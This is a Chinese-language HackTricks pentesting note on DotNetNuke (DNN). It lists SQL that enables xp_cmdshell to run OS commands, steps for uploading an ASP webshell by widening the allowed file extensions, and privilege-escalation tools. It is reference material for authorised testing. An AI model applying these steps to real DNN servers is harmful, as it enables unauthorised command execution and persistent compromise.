hacktricks/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

3.3 KiB
Raw Blame History

DotNetNuke (DNN)

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

DotNetNuke (DNN)

如果以管理员身份登录DNN很容易获得RCE。

RCE

通过SQL

在**设置页面下可以访问SQL控制台您可以在那里启用xp_cmdshell运行操作系统命令**。

使用以下代码行来启用**xp_cmdshell**

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

然后,按下**"运行脚本"**来运行这些 SQL 语句。

然后,使用类似以下内容来运行操作系统命令:

xp_cmdshell 'whoami'

通过 ASP webshell

Settings -> Security -> More -> More Security Settings 下,您可以在 Allowable File Extensions 下添加新的允许的扩展名,然后点击 Save 按钮。

添加 aspaspx,然后在 /admin/file-management 上传一个名为 shell.aspasp webshell

然后访问 /Portals/0/shell.asp 来访问您的 webshell。

提权

您可以使用 PotatoesPrintSpoofer 等工具来提升权限

从零开始学习 AWS 黑客技术 htARTE (HackTricks AWS Red Team Expert)!